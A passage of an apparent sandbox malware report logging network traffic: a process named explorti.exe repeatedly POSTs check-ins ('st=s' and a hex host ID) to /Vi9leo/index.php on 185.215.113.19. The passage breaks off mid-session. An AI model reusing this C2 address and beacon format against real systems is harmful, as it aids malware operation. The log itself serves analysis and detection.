                    Jul 26, 2024 21:05:06.668731928 CEST8056775185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:06.668981075 CEST5677580192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.672281027 CEST5677580192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.672842026 CEST5677680192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.677839041 CEST8056776185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:06.677911043 CEST8056775185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:06.677942038 CEST5677680192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.677968025 CEST5677580192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.678340912 CEST5677680192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:06.683279037 CEST8056776185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:07.445532084 CEST8056776185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:07.445591927 CEST5677680192.168.2.6185.215.113.19
                    Jul 26, 2024 21:05:13.585148096 CEST8056776185.215.113.19192.168.2.6
                    Jul 26, 2024 21:05:13.585199118 CEST5677680192.168.2.6185.215.113.19
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 26, 2024 21:03:44.505718946 CEST5352335162.159.36.2192.168.2.6
                    Jul 26, 2024 21:03:45.040390015 CEST53579681.1.1.1192.168.2.6
                    • 185.215.113.19
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.656720185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:03.898607969 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:04.757033110 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:04.759771109 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:05.033510923 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:04 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    1192.168.2.656721185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:05.156424999 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:05.945589066 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:05 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:05.946383953 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:06.197446108 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    2192.168.2.656722185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:06.311816931 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:07.071187973 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:07.072134972 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:07.320554018 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.656723185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:07.435200930 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:08.216475010 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:08.217242956 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:08.468384027 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.656724185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:08.576247931 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:09.346618891 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:09.347385883 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:09.603142977 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.656725185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:09.725866079 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:10.475296974 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:10.476126909 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:10.725986004 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.656726185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:10.864510059 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:11.658538103 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:11.660892010 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:11.917367935 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.656727185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:12.029055119 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:12.786170959 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:12.789001942 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:13.040823936 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.656728185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:13.158479929 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:13.939603090 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:13.940890074 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:14.189249039 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.656729185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:14.311000109 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:15.097166061 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:15.098040104 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:15.351702929 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.656731185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:15.497006893 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:16.307485104 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:16.308510065 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
                    Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 42 32 37 37 36 42 38 35 41 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34
                    Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BB2776B85A82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                    Jul 26, 2024 21:04:16.559497118 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.656732185.215.113.19805616C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
                    TimestampBytes transferredDirectionData
                    Jul 26, 2024 21:04:16.672704935 CEST154OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Jul 26, 2024 21:04:17.432195902 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Fri, 26 Jul 2024 19:04:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Jul 26, 2024 21:04:17.432885885 CEST312OUTPOST /Vi9leo/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.19
                    Content-Length: 160
                    Cache-Control: no-cache
